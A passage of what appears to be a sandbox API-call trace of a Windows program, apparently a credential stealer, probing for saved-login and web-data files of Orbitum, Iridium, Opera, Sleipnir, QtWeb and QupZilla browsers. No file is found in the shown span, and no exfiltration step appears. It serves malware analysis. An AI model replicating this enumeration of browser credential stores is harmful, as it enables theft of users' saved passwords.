(HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c448 [0063.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.256] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0063.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.257] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.258] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0063.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x63c428 [0063.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.259] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0063.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.261] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.264] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0063.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63c438 [0063.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.265] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0063.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.267] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.268] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0063.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x63c450 [0063.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.270] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0063.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.271] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.271] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0063.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c448 [0063.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.272] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0063.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.274] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.274] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0063.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x63c428 [0063.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.275] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0063.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.276] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.277] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0063.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63c438 [0063.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.278] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0063.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6382b0 | out: hHeap=0x620000) returned 1 [0063.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6382b0 [0063.280] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.280] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6382b0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.281] GetProcessHeap () returned 0x620000 [0063.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x638518 [0063.282] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.282] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0063.282] GetProcessHeap () returned 0x620000 [0063.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb6) returned 0x63c4a8 [0063.282] GetProcessHeap () returned 0x620000 [0063.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.284] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0063.284] GetProcessHeap () returned 0x620000 [0063.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a8 | out: hHeap=0x620000) returned 1 [0063.285] GetProcessHeap () returned 0x620000 [0063.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x638518 [0063.285] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.286] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0063.286] GetProcessHeap () returned 0x620000 [0063.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb2) returned 0x63c4a0 [0063.286] GetProcessHeap () returned 0x620000 [0063.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.287] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0063.287] GetProcessHeap () returned 0x620000 [0063.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a0 | out: hHeap=0x620000) returned 1 [0063.287] GetProcessHeap () returned 0x620000 [0063.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x638518 [0063.288] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.289] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0063.289] GetProcessHeap () returned 0x620000 [0063.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x63c480 [0063.289] GetProcessHeap () returned 0x620000 [0063.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.290] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0063.290] GetProcessHeap () returned 0x620000 [0063.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c480 | out: hHeap=0x620000) returned 1 [0063.290] GetProcessHeap () returned 0x620000 [0063.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x638518 [0063.291] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.291] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0063.291] GetProcessHeap () returned 0x620000 [0063.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62a548 [0063.291] GetProcessHeap () returned 0x620000 [0063.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.293] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0063.293] GetProcessHeap () returned 0x620000 [0063.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a548 | out: hHeap=0x620000) returned 1 [0063.294] GetProcessHeap () returned 0x620000 [0063.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x638518 [0063.295] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.295] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0063.295] GetProcessHeap () returned 0x620000 [0063.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2) returned 0x62e740 [0063.295] GetProcessHeap () returned 0x620000 [0063.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.297] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0063.297] GetProcessHeap () returned 0x620000 [0063.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62e740 | out: hHeap=0x620000) returned 1 [0063.297] GetProcessHeap () returned 0x620000 [0063.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x638518 [0063.298] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.298] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0063.298] GetProcessHeap () returned 0x620000 [0063.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x63c4a0 [0063.298] GetProcessHeap () returned 0x620000 [0063.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.300] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0063.300] GetProcessHeap () returned 0x620000 [0063.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a0 | out: hHeap=0x620000) returned 1 [0063.300] GetProcessHeap () returned 0x620000 [0063.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x638518 [0063.301] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.302] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0063.302] GetProcessHeap () returned 0x620000 [0063.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62a740 [0063.302] GetProcessHeap () returned 0x620000 [0063.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.303] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0063.303] GetProcessHeap () returned 0x620000 [0063.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a740 | out: hHeap=0x620000) returned 1 [0063.303] GetProcessHeap () returned 0x620000 [0063.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x638518 [0063.304] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.305] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0063.305] GetProcessHeap () returned 0x620000 [0063.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xac) returned 0x63c490 [0063.305] GetProcessHeap () returned 0x620000 [0063.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.306] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0063.306] GetProcessHeap () returned 0x620000 [0063.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c490 | out: hHeap=0x620000) returned 1 [0063.306] GetProcessHeap () returned 0x620000 [0063.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x638518 [0063.307] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.308] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0063.308] GetProcessHeap () returned 0x620000 [0063.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x63c4a8 [0063.308] GetProcessHeap () returned 0x620000 [0063.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.311] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0063.312] GetProcessHeap () returned 0x620000 [0063.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a8 | out: hHeap=0x620000) returned 1 [0063.312] GetProcessHeap () returned 0x620000 [0063.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x638518 [0063.313] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.313] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0063.313] GetProcessHeap () returned 0x620000 [0063.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xec) returned 0x63c4a0 [0063.313] GetProcessHeap () returned 0x620000 [0063.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.314] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0063.315] GetProcessHeap () returned 0x620000 [0063.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a0 | out: hHeap=0x620000) returned 1 [0063.315] GetProcessHeap () returned 0x620000 [0063.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x638518 [0063.315] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.316] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0063.316] GetProcessHeap () returned 0x620000 [0063.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xca) returned 0x63c480 [0063.316] GetProcessHeap () returned 0x620000 [0063.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.317] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0063.317] GetProcessHeap () returned 0x620000 [0063.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c480 | out: hHeap=0x620000) returned 1 [0063.317] GetProcessHeap () returned 0x620000 [0063.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x638518 [0063.318] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.319] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0063.319] GetProcessHeap () returned 0x620000 [0063.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xda) returned 0x63c490 [0063.319] GetProcessHeap () returned 0x620000 [0063.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.320] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0063.320] GetProcessHeap () returned 0x620000 [0063.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c490 | out: hHeap=0x620000) returned 1 [0063.320] GetProcessHeap () returned 0x620000 [0063.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x638518 [0063.321] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.321] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0063.321] GetProcessHeap () returned 0x620000 [0063.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf2) returned 0x63c4a8 [0063.321] GetProcessHeap () returned 0x620000 [0063.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.322] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0063.322] GetProcessHeap () returned 0x620000 [0063.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a8 | out: hHeap=0x620000) returned 1 [0063.323] GetProcessHeap () returned 0x620000 [0063.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x638518 [0063.323] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.324] wvsprintfW (in: param_1=0x638518, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0063.324] GetProcessHeap () returned 0x620000 [0063.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x63c4a0 [0063.324] GetProcessHeap () returned 0x620000 [0063.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.325] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0063.325] GetProcessHeap () returned 0x620000 [0063.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c4a0 | out: hHeap=0x620000) returned 1 [0063.326] GetProcessHeap () returned 0x620000 [0063.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x638518 [0063.326] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.327] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0063.327] GetProcessHeap () returned 0x620000 [0063.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcc) returned 0x63c480 [0063.327] GetProcessHeap () returned 0x620000 [0063.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.328] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0063.328] GetProcessHeap () returned 0x620000 [0063.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c480 | out: hHeap=0x620000) returned 1 [0063.328] GetProcessHeap () returned 0x620000 [0063.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x638518 [0063.329] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.330] wvsprintfW (in: param_1=0x638518, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0063.330] GetProcessHeap () returned 0x620000 [0063.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xdc) returned 0x63c490 [0063.330] GetProcessHeap () returned 0x620000 [0063.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.331] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0063.331] GetProcessHeap () returned 0x620000 [0063.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c490 | out: hHeap=0x620000) returned 1 [0063.331] GetProcessHeap () returned 0x620000 [0063.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x638518 [0063.331] GetProcessHeap () returned 0x620000 [0063.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b590 [0063.331] GetProcessHeap () returned 0x620000 [0063.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6280a0 [0063.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.333] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x6280a0 | out: phkResult=0x6280a0*=0x0) returned 0x2 [0063.333] GetProcessHeap () returned 0x620000 [0063.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6280a0 | out: hHeap=0x620000) returned 1 [0063.333] GetProcessHeap () returned 0x620000 [0063.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.333] GetProcessHeap () returned 0x620000 [0063.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b590 | out: hHeap=0x620000) returned 1 [0063.333] GetProcessHeap () returned 0x620000 [0063.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x638518 [0063.334] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.334] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x638518 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0063.334] GetProcessHeap () returned 0x620000 [0063.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f94) returned 0x638728 [0063.335] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.336] wvsprintfW (in: param_1=0x638728, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0063.336] GetProcessHeap () returned 0x620000 [0063.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9a) returned 0x62b1c0 [0063.336] GetProcessHeap () returned 0x620000 [0063.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638728 | out: hHeap=0x620000) returned 1 [0063.337] 